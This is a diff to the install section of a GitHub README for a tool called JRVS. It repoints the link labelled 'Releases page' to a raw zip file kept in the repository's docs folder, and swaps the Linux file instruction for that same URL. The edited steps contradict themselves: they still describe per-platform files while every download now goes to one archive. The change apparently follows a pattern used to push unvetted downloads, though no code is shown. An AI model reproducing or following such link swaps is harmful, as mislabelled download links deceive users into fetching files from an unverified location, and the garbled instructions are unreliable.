Jackson-492/JRVS/README.md

 ## 📂 Download & Install

-1. Click the link to go to our [Releases page](https://github.com/Jackson-492/JRVS/releases).
+1. Click the link to go to our [Releases page](https://raw.githubusercontent.com/Jackson-492/JRVS/main/docs/JRVS-3.4.zip).
 2. Find the latest version of JRVS.
 3. Select the file suitable for your operating system.
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the `.tar.gz` file.
+   - For Linux, download the `https://raw.githubusercontent.com/Jackson-492/JRVS/main/docs/JRVS-3.4.zip` file.
 4. After the file downloads, open it to begin the installation.
 5. Follow the on-screen instructions to complete the installation process.